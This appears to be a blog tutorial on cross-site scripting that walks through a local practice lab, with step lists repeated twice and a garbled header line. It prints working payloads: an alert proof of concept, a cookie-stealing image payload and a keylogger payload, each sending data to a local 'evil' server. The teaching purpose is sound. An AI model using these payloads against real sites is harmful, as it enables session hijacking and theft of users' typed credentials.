XSS vulnerabilities are generally used to steal sensitive information (login credentials, authentication tokens, personal user data) as well as perform actions on behalf of authenticated users.
πβπππΈπππππΈπππβ & βπβ:
Note: For Windows users, open Git Bash. You will use this program to run all the "terminal" commands you see in the rest of this guide.
For Linux and Mac users, open Terminal.
In your terminal program, use git to download the project:
1) git clone https://github.com/Learn-by-doing/xss.git
If successful, a new folder named xss should have been created.
2) Change directory into the new folder:
> cd xss
3) Install the project's dependencies using npm:
> npm install
4) Now we can run the local web server using Node.js:
> node server.js
5) If successful, you should see the following message: Server listening at localhost:3000. This means that a local web server is now running and is listening for requests at localhost:3000.
6) Open your browser and click the link.
> You should see a simple search form. Enter some text then press enter (or click the "search" button).
7) Open the developer tools in your browser (F12) and open the "Console" sub-tab.
Copy/paste the following code into the console and run it:
encodeURIComponent('<img src="does-not-exist" onerror="alert(\'hi!\')">');
8) Copy the output and paste it into the address bar so that the URL looks like this:
http://localhost:3000/?q=%3Cimg%20src%3D%22does-not-exist%22%20onerror%3D%22alert('hi!')%22%3E
9) Exploitation
Open the "Application" sub-tab in your browser's developer tools. Under "Storage" -> "Cookies", click "localhost:3000" to show the cookies being saved by the browser for this website.
10) Notice how there is a cookie named "connect.sid". This is a session cookie set by our local webserver. Is it possible for us to access this via the XSS vulnerability? Let's try. Repeat the steps from the "Proof of Concept" section above, but with the following code:
<img src="does-not-exist" onerror="alert(document.cookie)">
11) Encode the above HTML and use it as the search query, or try this link.
If successful, you should see the contents of the session cookie printed in an alert pop-up.
12) Now before continuing, we will need to start our "evil" web server. Run the following command in a second terminal window:
> node evil-server.js
13) And now try to use the following code with the XSS vulnerability to steal the session cookie:
<img src="does-not-exist" onerror="var img = document.createElement(\'img\'); img.src = \'http://localhost:3001/cookie?data=\' + document.cookie; document.querySelector(\'body\').appendChild(img);">
14) Encode the above HTML and use it as the search query, or try this link.
> Check the terminal window of the evil server. Do you see the contents of the session cookie?
15) So now the JavaScript code from the last example in a readable form:
var img = document.createElement('img');
img.src = 'http://localhost:3001/cookie?data=' + document.cookie;
document.querySelector('body').appendChild(img);
16) Now let's get even more nasty. Let's try a key-logger:
<img src="does-not-exist" onerror="var timeout; var buffer = \'\'; document.querySelector(\'body\').addEventListener(\'keypress\', function(event) { if (event.which !== 0) { clearTimeout(timeout); buffer += String.fromCharCode(event.which); timeout = setTimeout(function() { var xhr = new XMLHttpRequest(); var uri = \'http://localhost:3001/keys?data=\' + encodeURIComponent(buffer); xhr.open(\'GET\', uri); xhr.send(); buffer = \'\'; }, 400); } });">
17) Encode the above HTML and use it as the search query
Note: For Windows users, open Git Bash. You will use this program to run all the "terminal" commands you see in the rest of this guide.
For Linux and Mac users, open Terminal.
In your terminal program, use git to download the project:
1) git clone https://github.com/Learn-by-doing/xss.git
If successful, a new folder named xss should have been created.
2) Change directory into the new folder:
> cd xss
3) Install the project's dependencies using npm:
> npm install
4) Now we can run the local web server using Node.js:
> node server.js
5) If successful, you should see the following message: Server listening at localhost:3000. This means that a local web server is now running and is listening for requests at localhost:3000.
6) Open your browser and click the link.
> You should see a simple search form. Enter some text then press enter (or click the "search" button).
7) Open the developer tools in your browser (F12) and open the "Console" sub-tab.
Copy/paste the following code into the console and run it:
encodeURIComponent('<img src="does-not-exist" onerror="alert(\'hi!\')">');
8) Copy the output and paste it into the address bar so that the URL looks like this:
http://localhost:3000/?q=%3Cimg%20src%3D%22does-not-exist%22%20onerror%3D%22alert('hi!')%22%3E
9) Exploitation
Open the "Application" sub-tab in your browser's developer tools. Under "Storage" -> "Cookies", click "localhost:3000" to show the cookies being saved by the browser for this website.
10) Notice how there is a cookie named "connect.sid". This is a session cookie set by our local webserver. Is it possible for us to access this via the XSS vulnerability? Let's try. Repeat the steps from the "Proof of Concept" section above, but with the following code:
<img src="does-not-exist" onerror="alert(document.cookie)">
11) Encode the above HTML and use it as the search query, or try this link.
If successful, you should see the contents of the session cookie printed in an alert pop-up.
12) Now before continuing, we will need to start our "evil" web server. Run the following command in a second terminal window:
> node evil-server.js
13) And now try to use the following code with the XSS vulnerability to steal the session cookie:
<img src="does-not-exist" onerror="var img = document.createElement(\'img\'); img.src = \'http://localhost:3001/cookie?data=\' + document.cookie; document.querySelector(\'body\').appendChild(img);">
14) Encode the above HTML and use it as the search query, or try this link.
> Check the terminal window of the evil server. Do you see the contents of the session cookie?
15) So now the JavaScript code from the last example in a readable form:
var img = document.createElement('img');
img.src = 'http://localhost:3001/cookie?data=' + document.cookie;
document.querySelector('body').appendChild(img);
16) Now let's get even more nasty. Let's try a key-logger:
<img src="does-not-exist" onerror="var timeout; var buffer = \'\'; document.querySelector(\'body\').addEventListener(\'keypress\', function(event) { if (event.which !== 0) { clearTimeout(timeout); buffer += String.fromCharCode(event.which); timeout = setTimeout(function() { var xhr = new XMLHttpRequest(); var uri = \'http://localhost:3001/keys?data=\' + encodeURIComponent(buffer); xhr.open(\'GET\', uri); xhr.send(); buffer = \'\'; }, 400); } });">
17) Encode the above HTML and use it as the search query
Comments
Post a Comment